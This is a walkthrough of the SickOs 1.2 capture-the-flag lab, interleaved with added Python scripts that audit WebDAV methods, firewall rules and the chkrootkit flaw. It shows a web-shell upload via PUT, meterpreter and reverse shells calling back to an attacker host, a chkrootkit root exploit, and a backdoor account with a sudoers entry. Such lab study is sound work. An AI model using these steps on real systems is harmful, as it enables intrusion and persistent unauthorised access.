SickOs: 1.2

Reference

Writeup

Recon

  • dirb http://10.0.2.149

    -----------------
    DIRB v2.22    
    By The Dark Raver
    -----------------
    
    START_TIME: Mon Oct 31 19:56:59 2016
    URL_BASE: http://10.0.2.149/
    WORDLIST_FILES: /usr/share/dirb/wordlists/common.txt
    
    -----------------
    
    GENERATED WORDS: 4612
    
    ---- Scanning URL: http://10.0.2.149/ ----
    + http://10.0.2.149/index.php (CODE:200|SIZE:163)
    
    ==> DIRECTORY: http://10.0.2.149/test/
    
    ---- Entering directory: http://10.0.2.149/test/ ----
    (!) WARNING: Directory IS LISTABLE. No need to scan it.
    (Use mode '-w' if you want to scan it anyway)
    
    -----------------
    END_TIME: Mon Oct 31 19:57:04 2016
    DOWNLOADED: 4612 - FOUND: 1
    
  • OPTIONS method

    root@kali:~# curl -v -X OPTIONS http://10.0.2.149/test
    *   Trying 10.0.2.149...
    * Connected to 10.0.2.149 (10.0.2.149) port 80 (#0)
    > OPTIONS /test HTTP/1.1
    > Host: 10.0.2.149
    > User-Agent: curl/7.47.0
    > Accept: */*
    > 
    < HTTP/1.1 301 Moved Permanently
    < DAV: 1,2
    < MS-Author-Via: DAV
    < Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
    
    • The PUT method is supported
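    The Allow and DAV headers above are exactly what a hardening check should look at: any write-capable WebDAV method advertised on a directory is a finding. The script below is an added example, not part of the original writeup; it parses the curl -v response (the sample text is a constructed copy of the headers shown above), separates the advertised methods into read-only and write-capable ones, and reports whether PUT is reachable. The method classification and function names are this example's own assumptions.

```python
"""Audit an HTTP OPTIONS response for write-capable WebDAV methods.

Added example (not part of the original writeup): it parses the response
headers that curl -v printed above and reports which methods would let a
client modify content on the server. SAMPLE_RESPONSE is a constructed copy
of the page's captured headers.
"""
import re

# Methods that create, modify, move or delete server-side resources.
WRITE_METHODS = {"PUT", "DELETE", "MKCOL", "MOVE", "COPY", "PROPPATCH", "LOCK", "UNLOCK"}

# Constructed sample: the response lines from the curl -v OPTIONS request above.
SAMPLE_RESPONSE = """\
< HTTP/1.1 301 Moved Permanently
< DAV: 1,2
< MS-Author-Via: DAV
< Allow: PROPFIND, DELETE, MKCOL, PUT, MOVE, COPY, PROPPATCH, LOCK, UNLOCK
"""


def parse_headers(text):
    """Return a dict of header name (lower-case) -> value.

    Accepts either a raw HTTP response or curl -v output, whose response
    lines are prefixed with '< '. The status line is skipped.
    """
    headers = {}
    for line in text.splitlines():
        line = re.sub(r"^<\s?", "", line).strip()
        if not line or line.startswith("HTTP/"):
            continue
        name, sep, value = line.partition(":")
        if sep:
            headers[name.strip().lower()] = value.strip()
    return headers


def allowed_methods(text):
    """Methods advertised in the Allow header, upper-cased, in order."""
    allow = parse_headers(text).get("allow", "")
    return [m.strip().upper() for m in allow.split(",") if m.strip()]


def write_methods_exposed(text):
    """Subset of advertised methods that can change server content."""
    return [m for m in allowed_methods(text) if m in WRITE_METHODS]


def audit(text):
    """Summarise the exposure: WebDAV on or off, and which write methods leak."""
    headers = parse_headers(text)
    methods = allowed_methods(text)
    return {
        "webdav_enabled": "dav" in headers,
        "write_methods": [m for m in methods if m in WRITE_METHODS],
        "put_enabled": "PUT" in methods,
    }


if __name__ == "__main__":
    for key, value in audit(SAMPLE_RESPONSE).items():
        print(f"{key}: {value}")
```

    Run it against the saved output of curl -v -X OPTIONS for each directory the server exposes; a non-empty write_methods list on anything other than an authenticated upload location is the condition the rest of this writeup depends on, and the fix on the server side is to remove the WebDAV write methods (or the DAV module altogether) from that location.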

Upload web shell

  • Generate shell.php. Note that not every port can be used; the others appear to be blocked. After trying several common ports, only 443 and 8080 worked.
  • Upload it with the Firefox add-on Poster using PUT
  • Or upload it with curl: curl --upload-file shell.php -v http://10.0.2.149/test/shell.php -0, where -0 tells curl to use HTTP 1.0

Get the reverse shell

  • msf > use multi/handler
    msf exploit(handler) > set payload php/meterpreter/reverse_tcp
    payload => php/meterpreter/reverse_tcp
    msf exploit(handler) > set lhost 10.0.2.133
    lhost => 10.0.2.133
    msf exploit(handler) > set lport 443
    lport => 443
    msf exploit(handler) > run
    [*] Started reverse TCP handler on 10.0.2.133:443 
    [*] Starting the payload handler...
    
  • Trigger the reverse shell: curl http://10.0.2.149/test/shell.php
  • Spawn a tty
    shell
    echo "import pty; pty.spawn('/bin/bash')" > /tmp/asdf.py
    python /tmp/asdf.py
    

Exploit

  • The installed chkrootkit 0.49 has a Local Privilege Escalation vulnerability that can be exploited
    ls -l /etc/cron.daily
    chkrootkit -V
    chkrootkit version 0.49
    
  • Look up the exploit
    root@kali:~# searchsploit chkrootkit
    --------------------------------------------- ----------------------------------
     Exploit Title                               |  Path
                                                 | (/usr/share/exploitdb/platforms)
    --------------------------------------------- ----------------------------------
    Chkrootkit 0.49 - Local Root                 | ./linux/local/33899.txt
    Chkrootkit - Local Privilege Escalation      | ./linux/local/38775.rb
    --------------------------------------------- ----------------------------------
    
  • Search for the exploit in Metasploit

    msf > search chkrootkit
    Matching Modules
    =========================================
       Name                           Disclosure Date  Rank    Description
       ----                           ---------------  ----    -----------
       exploit/unix/local/chkrootkit  2014-06-04       manual  Chkrootkit Local Privilege Escalation
    
    msf > info exploit/unix/local/chkrootkit
    ...
    Payload information:
    
    Description:
      Chkrootkit before 0.50 will run any executable file named 
      /tmp/update as root, allowing a trivial privilege escalation. 
      WfsDelay is set to 24h, since this is how often a chkrootkit scan is 
      scheduled by default.
    
  • Reconnect to the reverse shell and background the current session

    meterpreter > background
    [*] Backgrounding session 1...
    msf exploit(handler) > sessions -l
    
    Active sessions
    ===============
    
      Id  Type                   Information             Connection
      --  ----                   -----------             ----------
      1   meterpreter php/linux  www-data (33) @ ubuntu  10.0.2.133:443 -> 10.0.2.149:60197 (10.0.2.149)
    
  • Select, configure and run the chkrootkit module and its payload

    msf exploit(handler) > use exploit/unix/local/chkrootkit
    msf exploit(chkrootkit) > set SESSION 1
    SESSION => 1
    msf exploit(chkrootkit) > set PAYLOAD cmd/unix/reverse
    PAYLOAD => cmd/unix/reverse
    msf exploit(chkrootkit) > set LHOST 10.0.2.133
    LHOST => 10.0.2.133
    msf exploit(chkrootkit) > set LPORT 8080
    LPORT => 8080
    msf exploit(chkrootkit) > run
    [*] Exploit completed, but no session was created.
    
    [*] Started reverse TCP double handler on 10.0.2.133:8080 
    msf exploit(chkrootkit) > [!] Rooting depends on the crontab (this could take a while)
    [*] Payload written to /tmp/update
    [*] Waiting for chkrootkit to run via cron...  
    [*] Accepted the first client connection...
    [*] Accepted the second client connection...
    [*] Command: echo M01xMQXn6xqmXWCI;
    [*] Writing to socket A
    [*] Writing to socket B
    [*] Reading from sockets...
    [*] Reading from socket A
    [*] A: "M01xMQXn6xqmXWCI\r\n"
    [*] Matching...
    [*] B is input...
    [*] Command shell session 2 opened (10.0.2.133:8080 -> 10.0.2.149:50756) at 2016-10-31 23:15:03 +0800
    [+] Deleted /tmp/update
    
  • Obtain a root shell

    msf exploit(chkrootkit) > sessions -l
    
    Active sessions
    ===============
    
      Id  Type                   Information             Connection
      --  ----                   -----------             ----------
      1   meterpreter php/linux  www-data (33) @ ubuntu  10.0.2.133:443 -> 10.0.2.149:60197 (10.0.2.149)
      2   shell unix                                     10.0.2.133:8080 -> 10.0.2.149:50756 (10.0.2.149)
    
    msf exploit(chkrootkit) > sessions -i 2
    [*] Starting interaction with 2...
    
    1211555505
    aInJpYftfRDnfxpjslWCtoyIGtRKBXmO
    true
    zXJjzWeZIBCKSAqPoFYxXJReoqrwVLxy
    IPmvajLeuDetBmuZiRthKLMtQTpoxTRE
    iPxhCiVRfysXvdlKeAmZpuBZsROFrgzf
    id
    uid=0(root) gid=0(root) groups=0(root)
    whoami
    root
    
  • Create a backdoor account
    /usr/sbin/useradd r00t
    passwd r00t
    Enter new UNIX password: t00r
    Retype new UNIX password: t00r
    passwd: password updated successfully
    echo "r00t ALL=(ALL:ALL) ALL" >> /etc/sudoers
    
  • Switch user
    ssh r00t@10.0.2.149
    sudo su -
    
  • Check the firewall configuration

    root@ubuntu:~# iptables -L
    Chain INPUT (policy DROP)
    target     prot opt source               destination
    ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:ssh
    ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:http
    ACCEPT     tcp  --  anywhere             anywhere             tcp spt:http-alt
    ACCEPT     tcp  --  anywhere             anywhere             tcp spt:https
    
    Chain FORWARD (policy ACCEPT)
    target     prot opt source               destination
    
    Chain OUTPUT (policy DROP)
    target     prot opt source               destination
    ACCEPT     tcp  --  anywhere             anywhere             tcp spt:ssh
    ACCEPT     tcp  --  anywhere             anywhere             tcp spt:http
    ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:http-alt
    ACCEPT     tcp  --  anywhere             anywhere             tcp dpt:https
    
    root@ubuntu:~# cat newRule
    # Generated by iptables-save v1.4.12 on Mon Apr 25 22:48:24 2016
    *filter
    :INPUT DROP [0:0]
    :FORWARD ACCEPT [0:0]
    :OUTPUT DROP [0:0]
    -A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
    -A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
    -A INPUT -p tcp -m tcp --sport 8080 -j ACCEPT
    -A INPUT -p tcp -m tcp --sport 443 -j ACCEPT
    -A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
    -A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT
    -A OUTPUT -p tcp -m tcp --dport 8080 -j ACCEPT
    -A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT
    COMMIT
    # Completed on Mon Apr 25 22:48:24 2016
    
  • It appears only ports 22, 80, 443 and 8080 are allowed in and out, which is why the PHP reverse shell could not connect on any other port.
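    The conclusion above can be checked mechanically rather than by reading the chains by eye. The script below is an added example, not from the writeup; it parses an iptables-save dump (SAMPLE_RULES is a constructed copy of the newRule file shown above) and decides, per port, whether an outbound TCP connection from the host can succeed. The detail worth noticing is that this policy has no conntrack/ESTABLISHED rule, so a connection to remote port P needs OUTPUT to accept --dport P and INPUT to accept --sport P for the replies; both chains are evaluated with first-match semantics and the chain policy as fallback. Function names and the restriction to single-port TCP rules are this example's own assumptions.

```python
"""Explain which TCP ports this iptables policy lets through.

Added example (not from the writeup). It parses an iptables-save dump and
answers the question the writeup closes on: which outbound connections can
the host make at all? SAMPLE_RULES is a constructed copy of the newRule
file shown above.
"""
import re

SAMPLE_RULES = """\
# Generated by iptables-save v1.4.12 on Mon Apr 25 22:48:24 2016
*filter
:INPUT DROP [0:0]
:FORWARD ACCEPT [0:0]
:OUTPUT DROP [0:0]
-A INPUT -p tcp -m tcp --dport 22 -j ACCEPT
-A INPUT -p tcp -m tcp --dport 80 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 8080 -j ACCEPT
-A INPUT -p tcp -m tcp --sport 443 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 22 -j ACCEPT
-A OUTPUT -p tcp -m tcp --sport 80 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 8080 -j ACCEPT
-A OUTPUT -p tcp -m tcp --dport 443 -j ACCEPT
COMMIT
# Completed on Mon Apr 25 22:48:24 2016
"""

# Only the simple single-port TCP rule shape used in this dump is parsed.
RULE_RE = re.compile(
    r"^-A (?P<chain>\w+) -p tcp -m tcp --(?P<dir>dport|sport) (?P<port>\d+) -j (?P<target>\w+)$"
)
POLICY_RE = re.compile(r"^:(?P<chain>\w+) (?P<policy>\w+) ")


def parse_ruleset(text):
    """Return (policies, rules): chain -> default policy, and parsed -A rules.

    An -A line this parser does not understand is kept as {'unparsed': ...}
    so that unexpected rules are visible instead of silently dropped.
    """
    policies, rules = {}, []
    for line in text.splitlines():
        line = line.strip()
        m = POLICY_RE.match(line)
        if m:
            policies[m["chain"]] = m["policy"]
            continue
        if line.startswith("-A "):
            m = RULE_RE.match(line)
            if m:
                rules.append({"chain": m["chain"], "dir": m["dir"],
                              "port": int(m["port"]), "target": m["target"]})
            else:
                rules.append({"chain": line.split()[1], "unparsed": line})
    return policies, rules


def accepts(policies, rules, chain, direction, port):
    """First matching rule in the chain decides; otherwise the chain policy."""
    for r in rules:
        if r["chain"] == chain and r.get("dir") == direction and r.get("port") == port:
            return r["target"] == "ACCEPT"
    return policies.get(chain, "ACCEPT") == "ACCEPT"


def outbound_connection_allowed(text, remote_port):
    """Can this host open a TCP connection to remote_port and receive replies?

    Without a conntrack rule the reply packets must match INPUT on their own,
    which is why both chains are consulted.
    """
    policies, rules = parse_ruleset(text)
    return (accepts(policies, rules, "OUTPUT", "dport", remote_port)
            and accepts(policies, rules, "INPUT", "sport", remote_port))


def inbound_service_allowed(text, local_port):
    """Can an outside client reach a listener on local_port (and get replies)?"""
    policies, rules = parse_ruleset(text)
    return (accepts(policies, rules, "INPUT", "dport", local_port)
            and accepts(policies, rules, "OUTPUT", "sport", local_port))


def usable_outbound_ports(text, candidates):
    """Sorted subset of candidate remote ports the host can connect out to."""
    return sorted(p for p in candidates if outbound_connection_allowed(text, p))


if __name__ == "__main__":
    print("outbound OK:", usable_outbound_ports(SAMPLE_RULES, [21, 443, 1234, 4444, 8080]))
    print("inbound OK:", [p for p in (22, 80, 443, 8080) if inbound_service_allowed(SAMPLE_RULES, p)])
```

    Feed it the output of iptables-save from any host and it reproduces the writeup's finding for this box (only 443 and 8080 outbound, only 22 and 80 inbound). From a defensive angle the same tool shows where an egress policy is still too loose: every port the outbound check returns is a port a compromised process can call home on, so the allow-list should be as short as the host's real dependencies permit.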
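    The module description earlier in this section states the whole condition in one sentence: chkrootkit before 0.50 runs an executable /tmp/update as root whenever the cron-scheduled scan fires. The script below is an added example, not from the writeup; it is the host-side check an administrator (or whoever cleans this box up afterwards) would want: parse the chkrootkit -V output for a version older than 0.50, and look for an executable /tmp/update, which on such a host is an indicator of active exploitation. The version string is a constructed copy of the output shown above; the function names, the 0.50 threshold taken from the module description, and the decision to treat an executable /tmp/update as an indicator are this example's own assumptions.

```python
"""Detect the chkrootkit < 0.50 privilege-escalation condition on a host.

Added example, not from the original writeup. Two checks: is the installed
chkrootkit older than 0.50, and does an executable /tmp/update exist that a
cron-driven scan would run as root? SAMPLE_VERSION_OUTPUT is a constructed
copy of the `chkrootkit -V` output shown above.
"""
import os
import re
import stat
import subprocess

# Per the Metasploit module description quoted above, 0.50 no longer runs /tmp/update.
FIXED_IN = (0, 50)
SAMPLE_VERSION_OUTPUT = "chkrootkit version 0.49"


def parse_version(output):
    """Extract (major, minor) from `chkrootkit -V` output; None if not found."""
    m = re.search(r"version\s+(\d+)\.(\d+)", output)
    return (int(m.group(1)), int(m.group(2))) if m else None


def is_vulnerable_version(output):
    """True when the reported version predates the fix."""
    version = parse_version(output)
    return version is not None and version < FIXED_IN


def check_update_file(path="/tmp/update"):
    """Report whether `path` exists, whether it is executable, and who owns it.

    An executable file at this path is the trigger the exploit relies on, so
    its presence on a host with an old chkrootkit is worth alerting on and
    removing; the owner uid tells you which account planted it.
    """
    try:
        st = os.stat(path)
    except FileNotFoundError:
        return {"present": False, "executable": False, "owner_uid": None}
    executable = bool(st.st_mode & (stat.S_IXUSR | stat.S_IXGRP | stat.S_IXOTH))
    return {"present": True, "executable": executable, "owner_uid": st.st_uid}


def assess(version_output, update_path="/tmp/update"):
    """Combine both checks into one finding."""
    vulnerable = is_vulnerable_version(version_output)
    update = check_update_file(update_path)
    return {
        "vulnerable_version": vulnerable,
        "update_file": update,
        # Old version *and* an executable /tmp/update: treat as exploitation in progress.
        "likely_exploited": vulnerable and update["present"] and update["executable"],
    }


def installed_version_output():
    """Run `chkrootkit -V` if present; otherwise fall back to the constructed sample."""
    try:
        proc = subprocess.run(["chkrootkit", "-V"], capture_output=True, text=True)
        return proc.stdout + proc.stderr
    except FileNotFoundError:
        return SAMPLE_VERSION_OUTPUT


if __name__ == "__main__":
    print(assess(installed_version_output()))
```

    The useful response on a finding is the one the page itself hints at: upgrade chkrootkit to 0.50 or later, delete any /tmp/update you did not put there, and review the cron.daily entry that would have run it. Run the check periodically (or from the same cron) so the window between a dropped file and the next scan is covered.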
